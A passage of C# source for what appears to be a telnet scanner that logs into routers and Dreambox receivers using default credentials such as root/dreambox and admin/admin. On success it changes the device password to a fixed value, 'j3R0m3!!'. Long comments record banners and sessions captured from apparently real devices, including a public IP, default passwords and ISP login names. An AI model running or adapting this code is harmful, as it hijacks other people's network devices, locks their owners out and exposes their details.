996. // Enter your selection below:
997.  
998. //>>>
999. //(2)
1000. // CONEXANT SYSTEMS, INC.
1001. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
1002.  
1003. // Password Setup
1004.  
1005.  
1006. // 1. Change Administrative Password
1007. // 2. Change PPP User Name and Password
1008. // 3. Change User Password
1009.  
1010.  
1011.  
1012.  
1013.  
1014.  
1015.  
1016.  
1017. // Press 'B' to go Back
1018. // Press 'M' to go to Main Menu
1019. // Enter your selection below
1020.  
1021.  
1022.  
1023. //>>>
1024.  
1025. //(1)
1026. // CONEXANT SYSTEMS, INC.
1027. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
1028.  
1029. // Change Administrative Password
1030.  
1031.  
1032. // Enter New Admin Password:
1033. // (no less than 8 characters, '&' is not accepted)
1034. // (Press ESC to quit)
1035.  
1036. //>>>
1037. //
1038. // CONEXANT SYSTEMS, INC.
1039. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
1040.  
1041. // Confirm Administrative Password
1042.  
1043.  
1044. // Re-enter New Admin Password:
1045. // (no less than 8 characters, '&' is not accepted)
1046. // (Press ESC to quit)
1047.  
1048. //>>>
1049.  
1050. // CONEXANT SYSTEMS, INC.
1051. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
1052.  
1053. // Password Setup
1054.  
1055.  
1056. // 1. Change Administrative Password
1057. // 2. Change PPP User Name and Password
1058. // 3. Change User Password
1059.  
1060. // Press 'B' to go Back
1061. // Press 'M' to go to Main Menu
1062. // Enter your selection below
1063.  
1064.  
1065.  
1066. //>>>
1067.  
1068.  
1069. // CONEXANT SYSTEMS, INC.
1070. // ACCESS RUNNER ADSL CONSOLE PORT 3.21
1071.  
1072. // Quit Session
1073.  
1074.  
1075. // This will quit current telnet session.
1076.  
1077.  
1078. // Press 'Y' to continue, or 'B' to go back.
1079. // Press 'M' for main menu.
1080.  
1081.  
1082. //>>>
1083.  
1084.  
1085.  
1086. //************************************************************************************
1087. //NetDVRDVS:admin
1088. //Password:
1089. //Login incorrect
1090.  
1091.  
1092. //************************************************************************************
1093. //User Access Verification
1094.  
1095. //Username: admin
1096. //Password:
1097. //% Login invalid
1098.  
1099.  
1100. //************************************************************************************
1101. //(212.217.28.244)
1102. //User Access Verification
1103.  
1104. //Password: 1234
1105. //GPBM>help
1106. //Help may be requested at any point in a command by entering
1107. //a question mark '?'. If nothing matches, the help list will
1108. //be empty and you must backup until entering a '?' shows the
1109. //available options.
1110. //Two styles of help are provided:
1111. //1. Full help is available when you are ready to enter a
1112. // command argument (e.g. 'show ?') and describes each possible
1113. // argument.
1114. //2. Partial help is provided when an abbreviated argument is entered
1115. // and you want to know what arguments match the input
1116. // (e.g. 'show pr?'.)
1117.  
1118. //GPBM>
1119. //GPBM>?
1120. //Exec commands:
1121. // <1-99> Session number to resume
1122. // access-enable Create a temporary Access-List entry
1123. // access-profile Apply user-profile to interface
1124. // clear Reset functions
1125. // connect Open a terminal connection
1126. // disable Turn off privileged commands
1127. // disconnect Disconnect an existing network connection
1128. // enable Turn on privileged commands
1129. // exit Exit from the EXEC
1130. // help Description of the interactive help system
1131. // lock Lock the terminal
1132. // login Log in as a particular user
1133. // logout Exit from the EXEC
1134. // name-connection Name an existing network connection
1135. // pad Open a X.29 PAD connection
1136. // ping Send echo messages
1137. // ppp Start IETF Point-to-Point Protocol (PPP)
1138. // resume Resume an active network connection
1139. // rlogin Open an rlogin connection
1140. // set Set system parameter (not config)
1141. // show Show running system information
1142. // slip Start Serial-line IP (SLIP)
1143. // systat Display information about terminal lines
1144. // telnet Open a telnet connection
1145. // terminal Set terminal line parameters
1146. // traceroute Trace route to destination
1147. // tunnel Open a tunnel connection
1148. // where List active connections
1149. // x28 Become an X.28 PAD
1150. // x3 Set X.3 parameters on PAD
1151.  
1152. //GPBM>
1153.  
1154. //GPBM>ping 8.8.8.8
1155.  
1156. //Type escape sequence to abort.
1157. //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
1158. //!!!!!
1159. //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
1160. //GPBM>
1161.  
1162. //GPBM>show ?
1163. //backup Backup status
1164. //c1700 Show c1700 information
1165. //cca CCA information
1166. //cdapi CDAPI information
1167. //class-map Show QoS Class Map
1168. //clock Display the system clock
1169. //compress Show compression statistics
1170. //dialer Dialer parameters and statistics
1171. //exception exception informations
1172. //flash: display information about flash: file system
1173.  
1174. //history Display the session command history
1175. //hosts IP domain-name, lookup style, nameservers, and host table
1176. //isdn ISDN information
1177. //location Display the system location
1178. //modemcap Show Modem Capabilities database
1179. //policy-map Show QoS Policy Map
1180. //ppp PPP parameters and statistics
1181. //queue Show queue contents
1182. //queueing Show queueing configuration
1183. //radius Shows radius information
1184. //rmon rmon statistics
1185. //rtr Response Time Reporter (RTR)
1186. //sessions Information about Telnet connections
1187. //snmp snmp statistics
1188. //tacacs Shows tacacs+ server statistics
1189. //template Template information
1190. //terminal Display terminal configuration parameters
1191. //traffic-shape traffic rate shaping configuration
1192. //users Display information about terminal lines
1193. //version System hardware and software status
1194.  
1195. //GPBM>show version
1196. //Cisco Internetwork Operating System Software
1197. //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
1198. //Copyright (c) 1986-2000 by cisco Systems, Inc.
1199. //Compiled Tue 14-Mar-00 16:40 by cmong
1200. //Image text-base: 0x80008088, data-base: 0x805B7EE0
1201.  
1202. //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
1203.  
1204. //GPBM uptime is 5 weeks, 6 days, 45 minutes
1205. //System returned to ROM by power-on
1206. //System image file is "flash:c1700-y-mz.121-1"
1207.  
1208. //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
1209. //.
1210. //Processor board ID JAD04180989 (362865562), with hardware revision 0000
1211. //M860 processor: part number 0, mask 32
1212. //Bridging software.
1213. //X.25 software, Version 3.0.0.
1214. //Basic Rate ISDN software, Version 1.1.
1215. //1 FastEthernet/IEEE 802.3 interface(s)
1216. //1 Serial(sync/async) network interface(s)
1217. //1 ISDN Basic Rate interface(s)
1218. //32K bytes of non-volatile configuration memory.
1219. //4096K bytes of processor board System flash (Read/Write)
1220.  
1221. //Configuration register is 0x2102
1222.  
1223. //GPBM>show diag
1224. //Slot 0:
1225. // C1720 1FE Mainboard Port adapter, 3 ports
1226. // Port adapter is analyzed
1227. // Port adapter insertion time unknown
1228. // EEPROM contents at hardware discovery:
1229. // Hardware Revision : 5.1
1230. // PCB Serial Number : JAD04180989
1231. // Part Number : 73-3201-05
1232. // Board Revision : 70
1233. // Fab Version : 04
1234. // EEPROM format version 4
1235. // EEPROM contents (hex):
1236. // 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
1237. // 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
1238. // 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1239. // 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1240. // 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1241. // 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1242. // 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1243. // 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
1244.  
1245. // WIC Slot 0:
1246. // Serial 1T WAN daughter card
1247. // Hardware revision 1.0 Board revision H0
1248. // Serial number 0018074153 Part number 800-01514-01
1249. // Test history 0x00 RMA number 00-00-00
1250. // Connector type WAN Module
1251. // EEPROM format version 1
1252. // EEPROM contents (hex):
1253. // 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
1254. // 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
1255.  
1256. // WIC Slot 1:
1257. // BRI S/T - 2186 WAN daughter card
1258. // Hardware revision 1.3 Board revision A0
1259. // Serial number 0019915070 Part number 800-01833-03
1260. // Test history 0x00 RMA number 00-00-00
1261. // Connector type WAN Module
1262. // EEPROM format version 1
1263. // EEPROM contents (hex):
1264. // 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
1265. // 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
1266.  
1267.  
1268.  
1269.  
1270. //************************************************************************************
1271. //-----------------------------------------------------------------------
1272. //Cisco Router and Security Device Manager (SDM) is installed on this device.
1273. //This feature requires the one-time use of the username "cisco"
1274. //with the password "cisco". The default username and password have a privilege le
1275. //vel of 15.
1276.  
1277. //Please change these publicly known initial credentials using SDM or the IOS CLI.
1278.  
1279. //Here are the Cisco IOS commands.
1280.  
1281. //username <myuser> privilege 15 secret 0 <mypassword>
1282. //no username cisco
1283.  
1284. //Replace <myuser> and <mypassword> with the username and password you want to use
1285. //.
1286.  
1287. //For more information about SDM please follow the instructions in the QUICK START
1288.  
1289. //GUIDE for your router or go to http://www.cisco.com/go/sdm
1290. //-----------------------------------------------------------------------
1291.  
1292.  
1293. //User Access Verification
1294.  
1295. //Username: cisco
1296. //Password:
1297. //% Login invalid
1298.  
1299.  
1300. //************************************************************************************
1301. //BCM96338 ADSL Router
1302. //Login: bad
1303. //Password:
1304. //Login incorrect. Try again.
1305. //Login: admin
1306. //Password: password
1307.  
1308. //Note: If you have problem with Backspace key, please make sure you configure you
1309. //r terminal emulator settings. For instance, from HyperTerminal you would need to
1310. // use File->Properties->Setting->Back Space key sends.
1311.  
1312.  
1313. // Main Menu
1314.  
1315. //1. ADSL Link State
1316. //2. LAN
1317. //3. WAN
1318. //4. DNS Server
1319. //5. Route Setup
1320. //6. NAT
1321. //7. Firewall
1322. //8. Quality Of Service
1323. //9. Management
1324. //10. Passwords
1325. //11. Diag
1326. //12. Reset to Default
1327. //13. Save and Reboot
1328. //14. Exit
1329. // ->
1330.  
1331. //(10)
1332.  
1333. //Note: If you have problem with Backspace key, please make sure you configure you
1334. //r terminal emulator settings. For instance, from HyperTerminal you would need to
1335. // use File->Properties->Setting->Back Space key sends.
1336.  
1337.  
1338. // Password Menu
1339.  
1340. //1. Admin
1341. //2. User
1342. //3. Support
1343. //4. Exit
1344. ///Passwords ->
1345.  
1346. //Note: If you have problem with Backspace key, please make sure you configure you
1347. //r terminal emulator settings. For instance, from HyperTerminal you would need to
1348. // use File->Properties->Setting->Back Space key sends.
1349.  
1350.  
1351. // Password Menu
1352.  
1353. //1. Admin
1354. //2. User
1355. //3. Support
1356. //4. Exit
1357. ///Passwords -> 1
1358.  
1359. // Password Configuration Menu For User admin
1360.  
1361. //Note: Maximum length of password is 16 characters.
1362. //Old password :
1363. //New password :
1364. //Confirm new password:
1365. //Password for admin changed successfully.
1366.  
1367. //Hit <enter> to continue
1368.  
1369.  
1370. //Note: If you have problem with Backspace key, please make sure you configure you
1371. //r terminal emulator settings. For instance, from HyperTerminal you would need to
1372. // use File->Properties->Setting->Back Space key sends.
1373.  
1374.  
1375. // DNS Menu
1376.  
1377. //1. Configure
1378. //2. Show
1379. //3. Exit
1380. /// DNS Server -> 2
1381.  
1382. //Automatic assigned IP address for DNS is enabled.
1383. //Primary DNS : 62.251.229.237
1384. //Secondary DNS: 62.251.229.223
1385.  
1386. //Hit <enter> to continue
1387.  
1388.  
1389. //14. Exit
1390. // -> 14
1391.  
1392. //Bye bye. Have a nice day!!!
1393.  
1394.  
1395. //Perte de la connexion à l'hôte.
1396.  
1397.  
1398. //************************************************************************************
1399. //Password: 1234
1400. // Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
1401.  
1402. // Prestige 650R-E1 Main Menu
1403. // Prestige 645 Main Menu
1404.  
1405. //Getting Started Advanced Management
1406. // 1. General Setup 21. Filter Set Configuration
1407. // 3. LAN Setup 22. SNMP Configuration
1408. // 4. Internet Access Setup 23. System Password
1409. // 24. System Maintenance
1410. //Advanced Applications 25. IP Routing Policy Setup
1411. // 11. Remote Node Setup 26. Schedule Setup
1412. // 12. Static Routing Setup
1413. // 15. NAT Setup
1414. // 99. Exit
1415.  
1416.  
1417.  
1418.  
1419.  
1420.  
1421. // Enter Menu Selection Number:
1422.  
1423. //(23)
1424. //
1425.  
1426. // Menu 23 - System Password
1427.  
1428. //Old Password= ?
1429. //New Password= ?
1430. //Retype to confirm= ?
1431.  
1432.  
1433.  
1434.  
1435.  
1436.  
1437.  
1438.  
1439.  
1440.  
1441.  
1442.  
1443.  
1444. // Enter here to CONFIRM or ESC to CANCEL:
1445.  
1446.  
1447.  
1448. //
1449.  
1450. // Menu 4 - Internet Access Setup
1451.  
1452. //ISP's Name= MyISP
1453. //Encapsulation= PPPoE
1454. //Multiplexing= LLC-based
1455. //VPI #= 8
1456. //VCI #= 35
1457. //ATM QoS Type= UBR
1458. // Peak Cell Rate (PCR)= 0
1459. // Sustain Cell Rate (SCR)= 0
1460. // Maximum Burst Size (MBS)= 0
1461. //My Login= saidi_im
1462. //My Password= ********
1463. //Idle Timeout (sec)= 0
1464. //IP Address Assignment= Dynamic
1465. // IP Address= N/A
1466. //Network Address Translation= SUA Only
1467. // Address Mapping Set= N/A
1468.  
1469. //Press ENTER to Confirm or ESC to Cancel:
1470.  
1471.  
1472. //************************************************************************************
1473. //Password: 1234
1474.  
1475. // Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
1476.  
1477. // Prestige 660HW-61 Main Menu
1478.  
1479. //Getting Started Advanced Management
1480. // 1. General Setup 21. Filter Set Configuration
1481. // 2. WAN Backup Setup 22. SNMP Configuration
1482. // 3. LAN Setup 23. System Security
1483. // 4. Internet Access Setup 24. System Maintenance
1484. // 25. IP Routing Policy Setup
1485. //Advanced Applications 26. Schedule Setup
1486. // 11. Remote Node Setup
1487. // 12. Static Routing Setup
1488. // 14. Dial-in User Setup 99. Exit
1489. // 15. NAT Setup
1490.  
1491.  
1492.  
1493.  
1494.  
1495. // Enter Menu Selection Number:
1496.  
1497. //(23)
1498.  
1499. //
1500.  
1501. // Menu 23 - System Security
1502.  
1503. //1. Change Password
1504. //2. RADIUS Server
1505.  
1506. //4. IEEE802.1x
1507.  
1508. //(1)
1509. //
1510. //Menu 23.1 - System Security - Change Password
1511.  
1512. // Old Password= ?
1513. // New Password= ?
1514. // Retype to confirm= ?
1515.  
1516.  
1517.  
1518.  
1519.  
1520.  
1521.  
1522.  
1523.  
1524.  
1525.  
1526.  
1527.  
1528. // Enter here to CONFIRM or ESC to CANCEL:
1529.  
1530.  
1531.  
1532.  
1533.  
1534.  
1535.  
1536.  
1537.  
1538.  
1539. // Enter Menu Selection Number:
1540.  
1541.  
1542.  
1543. //************************************************************************************
1544. //(Cisco router)
1545. //User Access Verification
1546.  
1547. //Username: bad
1548. //Password:
1549. //% Login invalid
1550.  
1551. //Username: admin
1552. //Password:
1553. //% Login invalid
1554.  
1555. //Username: admin
1556. //Password:
1557. //% Login invalid
1558.  
1559.  
1560. //Perte de la connexion à l'hôte.
1561.  
1562.  
1563. //************************************************************************************
1564. //**************************
1565. //* *
1566. //* The Gemini Project *
1567. //* *
1568. //**************************
1569.  
1570. //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
1571.  
1572. //dreambox login: root
1573. //Password:
1574.  
1575.  
1576. //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
1577. //Enter 'help' for a list of built-in commands.
1578.  
1579. //root@dreambox:~>
1580. //root@dreambox:~> help
1581. //
1582. //Built-in commands:
1583. //-------------------
1584. // . : alias bg break cd chdir command continue eval exec exit export
1585. // false fg getopts hash help jobs kill let local pwd read readonly
1586. // return set shift times trap true type ulimit umask unalias unset
1587. // wait
1588. //root@dreambox:~> passwd
1589. //Changing password for root
1590. //Enter the new password (minimum of 5, maximum of 8 characters)
1591. //Please use a combination of upper and lower case letters and numbers.
1592. //Enter new password:
1593. //Re-enter new password:
1594. //Password changed.
1595. //root@dreambox:~>
1596. //root@dreambox:~>
1597. //\[ fusermount mkdir start-stop-daemon
1598. //ash gbox mknod streampes
1599. //automount gbox.ver mkswap streamripper
1600. //awk gdaemon mmi.socket streamsec
1601. //basename gdaemon.socket more streamts
1602. //boot grep mount stty
1603. //bunzip2 gunzip mv su
1604. //busybox gzip nc swapoff
1605. //bzcat halt netstat swapon
1606. //cat hdparm nslookup sync
1607. //chgrp head online.log syslogd
1608. //chmod hostname passwd tail
1609. //chown hotplug pid.info tar
1610. //chroot hotplug.socket pidof telnet
1611. //clear httpd ping telnetd
1612. //cp id pmt.tmp test
1613. //date ifconfig poweroff top
1614. //dd in.ftpd prockill touch
1615. //df in.telnetd ps true
1616. //dmesg inadyn pwd tty
1617. //dos2unix inetd rdate udhcpc
1618. //dropbear init reboot udpstreampes
1619. //dropbearkey insmod reset umount
1620. //dropbearmulti kill rm uname
1621. //du killall rmdir uniq
1622. //dvbnet klogd rmmod unix2dos
1623. //echo lcdoff route uptime
1624. //enigma lcdstuff sc.info usleep
1625. //enigmanet ln sc01.info vi
1626. //env loadkmap scp wc
1627. //eraseall logger sed wget
1628. //etherwake login sh which
1629. //expr logread showlogo whoami
1630. //false losetup sleep xargs
1631. //find ls smbmnt yes
1632. //flashtool lsmod smbmount zcat
1633. //free md5sum sort
1634. //************************************************************************************
1635.  
1636. #endregion
1637.  
1638. if (banner.Contains("dreambox"))
1639. {
1640. //dreambox login:
1641. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
1642. recv = Sock_scan.Receive(data);
1643. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1644. Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
1645. //Password:
1646. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
1647. recv = Sock_scan.Receive(data);
1648. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1649. Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
1650. }
1651. else
1652. { //Vulcan
1653. //login:
1654. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
1655. recv = Sock_scan.Receive(data);
1656. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1657. Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
1658. //password:
1659. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
1660. recv = Sock_scan.Receive(data);
1661. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1662. Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
1663. }
1664. // cisco/cisco
1665. recv = Sock_scan.Receive(data);
1666. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1667. Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
1668. //Login Successful
1669.  
1670. //login:
1671. if(stringdata.Contains("ogin:"))
1672. {
1673. Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
1674. }
1675. else
1676. {
1677. //$
1678. //$passwd
1679. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
1680. recv = Sock_scan.Receive(data);
1681. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1682. Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
1683. if (banner.Contains("Vulcan"))
1684. {
1685. //Enter Old Password:
1686. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
1687. recv = Sock_scan.Receive(data);
1688. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1689. Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
1690. }
1691. else
1692. {
1693. //On a pas cette ligne sur une BusyBox ou une dreambox
1694. }
1695. //Enter New Password:
1696. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
1697. recv = Sock_scan.Receive(data);
1698. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1699. Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
1700. //Confirm New Password:
1701. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
1702. recv = Sock_scan.Receive(data);
1703. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1704. Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
1705. recv = Sock_scan.Receive(data);
1706. stringdata = Encoding.ASCII.GetString(data, 0, recv);
1707. Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
1708. //Login incorrect (dreambox)
1709.  
1710. //Password changed
1711.  
1712. //Set Done
1713. //SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
1714.  
1715. //passwd: An error occurred updating the password file. //BusyBox
1716. }
1717. //login:
1718.  
1719. Sock_scan.Close();
1720. }
1721.  
1722. if (banner.Contains("assword:"))
1723. {
1724. #region BANNERS
1725. //********************************************************
1726. //Info:Connection was denied by remote host according to ACL!
1727.  
1728. //********************************************************
1729. //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
1730. //admin
1731. //Valid commands are:
1732. //sys exit ether wan
1733. //ip bridge dot1q pktqos
1734. //show set lan
1735.  
1736. //********************************************************
1737. //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
1738. //1234
1739. //Valid commands are:
1740. //sys exit ether wan
1741. //etherdbg usb ip bridge
1742. //dot1q pktqos show set
1743. //lan
1744. //
1745. //tc> sys countrycode
1746. //country code = 253 //Djibouti
1747.  
1748. //********************************************************
1749. // *******************
1750. // Welcome to Vulcan
1751. // *******************
1752.  
1753. //Conexant Inc., Software Release 3.C10MTT0.8822A
1754. //Copyright (c) 2001-2003 by Conexant, Inc.
1755.  
1756. //login:
1757. //admin
1758.  
1759. //password:
1760. //admin
1761. //Login Successful
1762. //$
1763. //$help
1764. //Command Description
1765. //------- -----------
1766. //alias To Alias a command
1767. //apply Apply configuration/image file
1768. //commit Commit the active config to the flash
1769. //create Create a new entry of specified type
1770. //delete Delete the specified entry
1771. //download Download a file on to the Device
1772. //exit To exit the CLI shell
1773. //get Display info for the search
1774. //help Provides help
1775. //list List files
1776. //modify Modify information for specified entry
1777. //passwd To modify user password
1778. //ping The normal ping command
1779. //prompt Change the user prompt
1780. //reboot Reboot the device
1781. //remove Remove file
1782. //reset Reset info for the specified entry
1783. //size ATM Sizing Information
1784. //traceroute The normal traceroute command
1785. //trigger To set trigger
1786. //unalias To undefine previously defined alias
1787. //verbose Switch ON/OFF the verbose mode
1788.  
1789.  
1790. //********************************************************
1791. //Password: 1234
1792. //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
1793. //ras>
1794. //ras> help
1795. //Valid commands are:
1796. //sys exit ether wan
1797. //aux wlan ip ipsec
1798. //bridge certificates bm lan
1799. //vlan radius 8021x autoSec
1800. //ras> sys
1801. //packetscan adjtime callhist countrycode
1802. //date domainname edit extraphnum
1803. //feature firewall myZyxelCom hostname
1804. //logs stdio datetime time
1805. //tos trcdisp trclog trcpacket
1806. //version view wdog romreset
1807. //upnp atsh atmu ateb
1808. //xmodemmode diag save display
1809. //adminPassword userPassword default fwnotify
1810. //tripleplay general socket filter
1811. //ddns cpu winmes snmp
1812. //ras> sys adminPassword
1813. //Usage: adminPassword <new adminPassword>
1814. //ras> sys adminPassword j3R0m3!!
1815.  
1816. /*
1817. Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
1818.  
1819. Prestige 650R-E1 Main Menu
1820.  
1821. Getting Started Advanced Management
1822. 1. General Setup 21. Filter Set Configuration
1823. 3. LAN Setup 22. SNMP Configuration
1824. 4. Internet Access Setup 23. System Password
1825. 24. System Maintenance
1826. Advanced Applications 25. IP Routing Policy Setup
1827. 11. Remote Node Setup 26. Schedule Setup
1828. 12. Static Routing Setup
1829. 15. NAT Setup
1830. 99. Exit
1831.  
1832.  
1833.  
1834.  
1835.  
1836.  
1837. Enter Menu Selection Number:
1838. */
1839. /*
1840. Menu 1 - General Setup
1841.  
1842. System Name= ?
1843. Location=
1844. Contact Person's Name=
1845. Domain Name=
1846. Edit Dynamic DNS= No
1847.  
1848. Route IP= Yes
1849. Bridge= No
1850.  
1851.  
1852.  
1853.  
1854.  
1855.  
1856.  
1857.  
1858. Press ENTER to Confirm or ESC to Cancel:
1859. */
1860. /*
1861.  
1862.  
1863. Menu 23 - System Password
1864.  
1865. Old Password= ?
1866. New Password= ?
1867. Retype to confirm= ?
1868.  
1869.  
1870.  
1871.  
1872.  
1873.  
1874.  
1875.  
1876.  
1877.  
1878.  
1879.  
1880.  
1881. Enter here to CONFIRM or ESC to CANCEL:
1882. */
1883. /*
1884. Menu 3 - LAN Setup
1885.  
1886. 1. LAN Port Filter Setup
1887. 2. TCP/IP and DHCP Setup
1888.  
1889.  
1890.  
1891.  
1892.  
1893.  
1894.  
1895.  
1896.  
1897.  
1898.  
1899.  
1900.  
1901.  
1902. Enter Menu Selection Number:
1903. */
1904. /*
1905. Menu 3.1 - LAN Port Filter Setup
1906.  
1907. Input Filter Sets:
1908. protocol filters=
1909. device filters=
1910. Output Filter Sets:
1911. protocol filters=
1912. device filters=
1913. */
1914. /*
1915. Menu 3.2 - TCP/IP and DHCP Setup
1916.  
1917. DHCP Setup
1918. DHCP= Server
1919. Client IP Pool Starting Address= 192.168.1.33
1920. Size of Client IP Pool= 32
1921. Primary DNS Server= 0.0.0.0
1922. Secondary DNS Server= 0.0.0.0
1923. Remote DHCP Server= N/A
1924. TCP/IP Setup:
1925. IP Address= 192.168.1.1
1926. IP Subnet Mask= 255.255.255.0
1927. RIP Direction= Both
1928. Version= RIP-2B
1929. Multicast= None
1930. IP Policies=
1931. Edit IP Alias= No
1932.  
1933. Press ENTER to Confirm or ESC to Cancel:
1934.  
1935. Press Space Bar to Toggle.
1936. */
1937. /*
1938. Menu 4 - Internet Access Setup
1939.  
1940. ISP's Name= MyISP
1941. Encapsulation= PPPoE
1942. Multiplexing= LLC-based
1943. VPI #= 8
1944. VCI #= 35
1945. ATM QoS Type= UBR
1946. Peak Cell Rate (PCR)= 0
1947. Sustain Cell Rate (SCR)= 0
1948. Maximum Burst Size (MBS)= 0
1949. My Login= zemzem2
1950. My Password= ********
1951. Idle Timeout (sec)= 0
1952. IP Address Assignment= Dynamic
1953. IP Address= N/A
1954. Network Address Translation= SUA Only
1955. Address Mapping Set= N/A
1956.  
1957. Press ENTER to Confirm or ESC to Cancel:
1958. */
1959. /*
1960. Menu 11 - Remote Node Setup
1961.  
1962. 1. MyISP (ISP, SUA)
1963. 2. ________
1964. 3. ________
1965. 4. ________
1966. 5. ________
1967. 6. ________
1968. 7. ________
1969. 8. ________
1970.  
1971.  
1972.  
1973.  
1974.  
1975.  
1976.  
1977.  
1978. Enter Node # to Edit:
1979. */
1980. /*
1981. Menu 11.1 - Remote Node Profile
1982.  
1983. Rem Node Name= MyISP Route= IP
1984. Active= Yes Bridge= No
1985.  
1986. Encapsulation= PPPoE Edit IP/Bridge= No
1987. Multiplexing= LLC-based Edit ATM Options= No
1988. Service Name= zyxel
1989. Incoming: Telco Option:
1990. Rem Login= Allocated Budget(min)= 0
1991. Rem Password= ******** Period(hr)= 0
1992. Outgoing: Schedule Sets=
1993. My Login= zemzem2 Nailed-Up Connection= Yes
1994. My Password= ******** Session Options:
1995. Authen= CHAP/PAP Edit Filter Sets= No
1996. Idle Timeout(sec)= N/A
1997. Edit Traffic Redirect= No
1998.  
1999. Press ENTER to Confirm or ESC to Cancel:
2000. */
2001. /*
2002. Menu 21 - Filter Set Configuration
2003.  
2004. Filter Filter
2005. Set # Comments Set # Comments
2006. ------ ----------------- ------ -----------------
2007. 1 _______________ 7 _______________
2008. 2 _______________ 8 _______________
2009. 3 _______________ 9 _______________
2010. 4 _______________ 10 _______________
2011. 5 _______________ 11 _______________
2012. 6 _______________ 12 _______________
2013.  
2014.  
2015.  
2016. Enter Filter Set Number to Configure= 0
2017.  
2018. Edit Comments= N/A
2019.  
2020. Press ENTER to Confirm or ESC to Cancel:
2021. */
2022. /*
2023. Menu 21.1 - Filter Rules Summary
2024.  
2025. # A Type Filter Rules M m n
2026. - - ---- --------------------------------------------------------------- - - -
2027. 1 N
2028. 2 N
2029. 3 N
2030. 4 N
2031. 5 N
2032. 6 N
2033.  
2034.  
2035.  
2036.  
2037.  
2038.  
2039.  
2040.  
2041. Enter Filter Rule Number (1-6) to Configure:
2042.  
2043. */
2044. /*
2045. Menu 21.1.1 - TCP/IP Filter Rule
2046.  
2047. Filter #: 1,1
2048. Filter Type= TCP/IP Filter Rule
2049. Active= No
2050. IP Protocol= 0 IP Source Route= No
2051. Destination: IP Addr=
2052. IP Mask=
2053. Port #=
2054. Port # Comp= None
2055. Source: IP Addr=
2056. IP Mask=
2057. Port #=
2058. Port # Comp= None
2059. TCP Estab= N/A
2060. More= No Log= None
2061. Action Matched= Check Next Rule
2062. Action Not Matched= Check Next Rule
2063.  
2064. Press ENTER to Confirm or ESC to Cancel:
2065. ress Space Bar to Toggle.
2066. */
2067. /*
2068. Menu 22 - SNMP Configuration
2069.  
2070. SNMP:
2071. Get Community= public
2072. Set Community= public
2073. Trusted Host= 0.0.0.0
2074. Trap:
2075. Community= public
2076. Destination= 0.0.0.0
2077.  
2078.  
2079.  
2080.  
2081.  
2082.  
2083.  
2084.  
2085.  
2086. Press ENTER to Confirm or ESC to Cancel:
2087. */
2088. /*
2089. Menu 24 - System Maintenance
2090.  
2091. 1. System Status
2092. 2. System Information and Console Port Speed
2093. 3. Log and Trace
2094. 4. Diagnostic
2095. 5. Backup Configuration
2096. 6. Restore Configuration
2097. 7. Upload Firmware
2098. 8. Command Interpreter Mode
